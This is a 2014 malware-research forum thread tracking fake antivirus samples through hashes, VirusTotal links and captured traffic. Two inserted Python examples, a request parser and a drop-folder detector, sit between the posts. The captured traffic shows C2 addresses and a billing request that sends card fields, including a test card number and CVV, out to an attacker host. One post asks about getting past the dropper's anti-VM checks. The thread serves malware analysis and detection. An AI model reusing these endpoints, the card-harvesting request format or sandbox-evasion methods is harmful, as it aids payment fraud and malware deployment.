
Rogue Antimalware (FakeAV, 2014 year)

PostPosted:Wed Jan 01, 2014 6:08 pm
by Xylitol

2010 year FakeAV
2011 year FakeAV
2012 year FakeAV
2013 year FakeAV

Windows Accelerator Pro
https://www.virustotal.com/en/file/6946 ... 388598425/ > 6/46
http://web-sniffer.net/index.php?url=ht ... =GET&uak=0
Network activities:
http://zocrxiyds.freetzi.com/1.php
• dns: 1 ›› ip: 69.162.82.253 - address: ZOCRXIYDS.FREETZI.COM
http://c3913c6c.webantiviruslk.pl/index.html
• dns: 1 ›› ip: 109.236.86.172 - address: C3913C6C.WEBANTIVIRUSLK.PL
---
http://93.115.82.248/?0=1&1=1&2=9&3=i&4=2600&5=1&6=1111&7=obqrhutjgv
http://93.115.82.248/?0=1&1=1&2=9&3=p&4=2600&5=1&6=1111&7=obqrhutjgv
http://94.185.80.155/customgate2/?callback=jQuery17203112214965869417_1388599195453&name=Xylibox+Labs&email=xylitol%40malwareint.com&num=4111111111111111&cvv=147&year=2017&month=05&phone=3-478-856-54-05&address=123+winlocker+street&country=FRA&state=XX&zip=75000&option=0&support=false&id=1&sub_id=1&install_id=obqrhutjgv&project_id=9&serial=EWBWF-QYHBS-XGTGK-EH0A&_=1388599353015
http://94.185.80.155/customgate2/process/?callback=jQuery17203112214965869417_1388599195454&transaction_id=646959059412b4308a4c613844951708&_=1388599356453
http://94.185.80.155/customgate2/process/?callback=jQuery17203112214965869417_1388599195455&transaction_id=646959059412b4308a4c613844951708&_=1388599359469
http://94.185.80.155/customgate2/process/?callback=jQuery17203112214965869417_1388599195456&transaction_id=646959059412b4308a4c613844951708&_=1388599362469
http://94.185.80.155/customgate2/process/?callback=jQuery17203112214965869417_1388599195457&transaction_id=646959059412b4308a4c613844951708&_=1388599365469
http://94.185.80.155/customgate2/process/?callback=jQuery17203112214965869417_1388599195458&transaction_id=646959059412b4308a4c613844951708&_=1388599368469
http://93.115.82.248/?0=1&1=1&2=9&3=p&4=2600&5=1&6=1111&7=obqrhutjgv
--
fakeav://payandsec.com/p/?group=sgp&nid=9A93E62D&affid=85700&lid=0040&ver=0040 https://www.virustotal.com/en/ip-address/178.162.199.33/information/
fakeav://sgpsupport.com/
https://www.virustotal.com/en/ip-addres ... formation/
https://www.virustotal.com/en/ip-addres ... formation/
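As an added example (not code from the post), here is a small Python parser over the two request types in the capture above: the positional check-in to 93.115.82.248 and the customgate2 billing request to 94.185.80.155. It shows which card fields the rogue sends as plain GET query parameters (with a JSONP callback, so any proxy or web-server log on the path ends up holding the full PAN and CVV) and ties the two requests to one infection through the install_id. The URLs are copied from the post; the split of parameters into "card" and "tracking" groups is my own assumption. 4111111111111111 is the standard Visa test number, so the Luhn check passes without any real card being involved.

```python
from urllib.parse import urlsplit, parse_qs

# Requests copied verbatim from the capture above: the positional beacon to
# 93.115.82.248 and the "customgate2" billing request to 94.185.80.155.
BEACON_URL = "http://93.115.82.248/?0=1&1=1&2=9&3=p&4=2600&5=1&6=1111&7=obqrhutjgv"
GATE_URL = (
    "http://94.185.80.155/customgate2/?callback=jQuery17203112214965869417_1388599195453"
    "&name=Xylibox+Labs&email=xylitol%40malwareint.com&num=4111111111111111&cvv=147"
    "&year=2017&month=05&phone=3-478-856-54-05&address=123+winlocker+street&country=FRA"
    "&state=XX&zip=75000&option=0&support=false&id=1&sub_id=1&install_id=obqrhutjgv"
    "&project_id=9&serial=EWBWF-QYHBS-XGTGK-EH0A&_=1388599353015"
)

# Field groupings are an assumption based on the parameter names; the rogue's
# authors document nothing.
CARD_FIELDS = ("name", "num", "cvv", "month", "year", "address", "zip", "country")
TRACKING_FIELDS = ("id", "sub_id", "install_id", "project_id", "serial")


def luhn_valid(pan: str) -> bool:
    """Luhn checksum: confirms 'num' is shaped like a real card number."""
    digits = [int(c) for c in pan if c.isdigit()]
    if len(digits) < 13:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:  # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep BIN and last four only, the form a report or log should carry."""
    if len(pan) < 10:
        return "*" * len(pan)
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def _query(url: str) -> dict:
    """Single-valued query dict; '+' and %xx escapes are decoded by parse_qs."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def parse_gate_request(url: str) -> dict:
    """Split the billing request into what is exfiltrated and how the
    installation identifies itself to the gate."""
    q = _query(url)
    return {
        "host": urlsplit(url).hostname,
        "jsonp": q.get("callback", "").startswith("jQuery"),
        "card": {k: q[k] for k in CARD_FIELDS if k in q},
        "tracking": {k: q[k] for k in TRACKING_FIELDS if k in q},
        "pan_luhn_valid": luhn_valid(q.get("num", "")),
        "pan_masked": mask_pan(q.get("num", "")),
    }


def parse_beacon(url: str) -> list:
    """The check-in uses bare positional keys 0..N; return the values in order."""
    q = _query(url)
    return [q[str(i)] for i in range(len(q))]


def same_install(beacon_url: str, gate_url: str) -> bool:
    """True when the beacon's last field equals the gate's install_id, i.e.
    both requests can be attributed to one infection."""
    return parse_beacon(beacon_url)[-1] == _query(gate_url).get("install_id")


if __name__ == "__main__":
    info = parse_gate_request(GATE_URL)
    print("card fields sent in the clear:", sorted(info["card"]))
    print("PAN", info["pan_masked"], "Luhn OK:", info["pan_luhn_valid"])
    print("tracking:", info["tracking"])
    print("beacon fields:", parse_beacon(BEACON_URL))
    print("beacon and gate share install_id:", same_install(BEACON_URL, GATE_URL))
```

The same install_id, project_id and the EWBWF-... serial are what you would carry into a proxy-log search; mask_pan is there because the raw PAN should never be pasted into a ticket or a forum post.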

Re: Rogue Antimalware (FakeAV, 2014 year)

PostPosted:Wed Jan 01, 2014 7:17 pm
by Win32:Virut

BitNefender Fake AV

PostPosted:Wed Jan 01, 2014 11:13 pm
by dairu87
Ran across a really nasty Fake AV today... Came with some sort of bootkit... another tech had already removed the rootkit so I cannot identify that... but this Fake AV doesn't seem to be pulling up anything to interfere with people's machines... It looks like it is just running in the background... It dumps a bunch of randomly named folders to %appdata% and fills them with randomly named .exe's to invoke its primary process and max out the CPU & memory. It doesn't seem to have a limit to how many of those directories it makes either... There were about 40 different directories all filled with malicious .exe's. It also dumps around 10-12 randomly named .exe's into the syswow64 directory. I was unable to obtain any samples of a dropper unfortunately (Sorry) But was wondering... has anyone else seen this nasty thing?
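A detection heuristic for the behaviour dairu87 describes, added here as an example and not taken from the post or from any vendor tool: scan a profile directory for randomly named subfolders that hold PE files, and a system directory for loose randomly named PE files. The "random name" test (a 6-20 character alphanumeric name with a run of four or more consonants, or letters mixed with digits) is my own assumption, as is the constructed sample tree; on a live machine you would point it at %APPDATA%, %LOCALAPPDATA% and C:\Windows\SysWOW64 instead and triage every hit by hash.

```python
import tempfile
from pathlib import Path

VOWELS = set("aeiou")


def max_consonant_run(s: str) -> int:
    """Length of the longest run of consecutive consonant letters."""
    run = best = 0
    for c in s:
        if c.isalpha() and c not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def looks_random(name: str) -> bool:
    """Assumed heuristic for generated names such as 'obqrhutjgv': 6-20
    alphanumeric chars with a 4+ consonant run, or letters mixed with digits."""
    stem = name.lower()
    if not (6 <= len(stem) <= 20) or not stem.isalnum():
        return False
    mixed = any(c.isdigit() for c in stem) and any(c.isalpha() for c in stem)
    return max_consonant_run(stem) >= 4 or mixed


def is_pe(path: Path) -> bool:
    """Check the MZ header rather than trusting the extension."""
    try:
        with path.open("rb") as f:
            return f.read(2) == b"MZ"
    except OSError:
        return False


def scan_drop_folders(root, min_pes=1):
    """[(folder, [pe names])] for random-named direct subfolders of root that
    hold PE files (the %APPDATA% pattern from the post)."""
    hits = []
    for d in sorted(p for p in Path(root).iterdir() if p.is_dir()):
        if not looks_random(d.name):
            continue
        pes = sorted(f.name for f in d.iterdir() if f.is_file() and is_pe(f))
        if len(pes) >= min_pes:
            hits.append((d.name, pes))
    return hits


def scan_loose_pes(root):
    """Random-named PE files sitting directly in root (the SysWOW64 pattern)."""
    return sorted(f.name for f in Path(root).iterdir()
                  if f.is_file() and looks_random(f.stem) and is_pe(f))


def build_demo_tree() -> Path:
    """Constructed sample, not real malware: fake 'MZ' stubs in two random-named
    folders, a legitimate-looking folder with a non-PE, and two loose files."""
    base = Path(tempfile.mkdtemp(prefix="fakeav_demo_"))
    layout = {
        "obqrhutjgv": ["kqzwpfhx.exe", "trvbnmdl.exe"],
        "x7k2pq9w": ["gjhrtwqp.exe"],
        "Microsoft": ["settings.dat"],
        ".": ["hjqwzrtk.exe", "notepad.exe"],
    }
    for folder, files in layout.items():
        (base / folder).mkdir(exist_ok=True)
        for name in files:
            data = b"MZ" + b"\0" * 62 if name.endswith(".exe") else b"not a PE"
            (base / folder / name).write_bytes(data)
    return base


if __name__ == "__main__":
    root = build_demo_tree()
    for folder, pes in scan_drop_folders(root):
        print(f"{folder}: {len(pes)} PE file(s): {', '.join(pes)}")
    print("loose random-named PEs:", scan_loose_pes(root))
```

The heuristic is deliberately loose: a name test alone throws false positives, so hits are only reported where a PE file is actually present, and on a real box every flagged file should still be hashed and submitted rather than deleted on sight.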

Re: BitNefender Fake AV

PostPosted:Fri Jan 03, 2014 10:21 pm
by patriq
dairu87 wrote:Ran across a really nasty Fake AV today... I was unable to obtain any samples of a dropper unfortunately (Sorry) But was wondering... has anyone else seen this nasty thing?
no sample or hash of the file?

don't think you will find much without those details... good luck anyway.

Re: Rogue Antimalware (FakeAV, 2014 year)

PostPosted:Sat Jan 04, 2014 1:19 am
by malwareMD
thanks for sharing, we have also seen similar variants in past week.

Re: Rogue Antimalware (FakeAV, 2014 year)

PostPosted:Sat Jan 04, 2014 4:19 pm
by Cody Johnston
malwareMD wrote:thanks for sharing, we have also seen similar variants in past week.
dairu87 wrote:It dumps a bunch of randomly named folders to %appdata% and fills them with randomly named .exe's to invoke its primary process and max out the CPU & memory.
dairu87 wrote:It also dumps around 10-12 randomly named .exe's into the syswow64 directory.
Please share what you find if you come across this again. A sample of each exe from %appdata% and syswow64/system32 will work. A screenshot and VirusTotal scan would be very helpful for us as well. Use the first 2 posts in this topic as an example. Many times with rogues the exe that runs the UI acts also as a dropper, so you may in fact have found a dropper already. Thanks! :)

Re: BitNefender Fake AV

PostPosted:Wed Jan 08, 2014 12:25 am
by Cody Johnston
dairu87 wrote:Ran across a really nasty Fake AV today... Came with some sort of bootkit... another tech had already removed the rootkit so I cannot identify that... but this Fake AV doesn't seem to be pulling up anything to interfere with people's machines... It looks like it is just running in the background... It dumps a bunch of randomly named folders to %appdata% and fills them with randomly named .exe's to invoke its primary process and max out the CPU & memory. It doesn't seem to have a limit to how many of those directories it makes either... There were about 40 different directories all filled with malicious .exe's. It also dumps around 10-12 randomly named .exe's into the syswow64 directory. I was unable to obtain any samples of a dropper unfortunately (Sorry) But was wondering... has anyone else seen this nasty thing?
Attached the dropper, it was in %localappdata% in a randomly named folder. Looks like Cidox.B was the bootkit on this one.

Publisher BitMefender S.R.L.

MD5 204806d51d301a99be49b8882a791cfc
https://www.virustotal.com/en/file/10cc ... 389139839/

Re: Rogue Antimalware (FakeAV, 2014 year)

PostPosted:Wed Jan 08, 2014 3:00 pm
by bitstechs
Hmm, must have good anti-VM on that dropper Cody. I've got my VirtualBox patched for anti-VM and the virus doesn't want to infect it, any thoughts or workarounds?

Re: Rogue Antimalware (FakeAV, 2014 year)

PostPosted:Fri Jan 10, 2014 3:35 pm
by Win32:Virut
Image

Re: Rogue Antimalware (FakeAV, 2014 year)

PostPosted:Sun Jan 12, 2014 12:05 pm
by hx1997
Smart Guard Protection - Malware Security Suite

VT low detection 3 / 45
https://www.virustotal.com/en/file/2304 ... 389528458/
Attachment: 捕获3.png ("Capture 3", screenshot)